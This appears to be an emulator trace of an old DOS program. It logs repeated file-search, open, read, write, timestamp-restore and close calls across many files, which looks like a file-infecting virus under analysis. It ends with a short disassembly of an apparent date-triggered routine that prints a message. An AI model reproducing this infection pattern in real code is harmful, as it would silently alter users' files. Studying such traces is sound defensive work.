2018-12-25T11:43:00.121671485Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.127418228Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.131673742Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.142832921Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.150538878Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.159028667Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.16096568Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.163757841Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.167565939Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.170890113Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.179708047Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.183625889Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.185575454Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.192910606Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.195116911Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.20428639Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.209916903Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.213518088Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.22500323Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.233548099Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.241015878Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.243426874Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.246552271Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.249324416Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.259908727Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.269164819Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.272569985Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.27539088Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.28354879Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.285652595Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.295599923Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.301842141Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.304827204Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.316330644Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.324400346Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.331672247Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.334127513Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.340167709Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.342980311Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.346762687Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.357740489Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.361196435Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.363290977Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.372453064Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.374921618Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.384022865Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.391236265Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.394763151Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.405916231Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.414136096Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.422281619Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.424076146Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.435270025Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.441388857Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.444456536Z 59 PC: 12aa4 | Change current directory
2018-12-25T11:43:00.449459043Z 71 PC: 12ac7 | Get current directory
2018-12-25T11:43:00.454186015Z 59 PC: 12afa | Change current directory
2018-12-25T11:43:00.466338761Z 59 PC: 12b1b | Change current directory
2018-12-25T11:43:00.468739002Z 44 PC: 12b1f | Get time 0x12b1f: cmp dx, 5
0x12b22: ja 0x12b4c
0x12b24: nop
0x12b25: nop
0x12b26: nop
0x12b27: mov ax, 0xd
0x12b2a: int 0x10
0x12b2c: lea si, word ptr [bp + 0x3c2]
0x12b30: cld
0x12b31: lodsb al, byte ptr [si]
0x12b32: or al, al
0x12b34: je 0x12b43
0x12b36: nop
0x12b37: nop
0x12b38: nop
0x12b39: mov ah, 0xe
0x12b3b: xor bh, bh
0x12b3d: mov bl, 5
0x12b3f: int 0x10
0x12b41: jmp 0x12b30
2018-12-25T11:43:00.472951536Z 26 PC: 12b5c | Set disk transfer address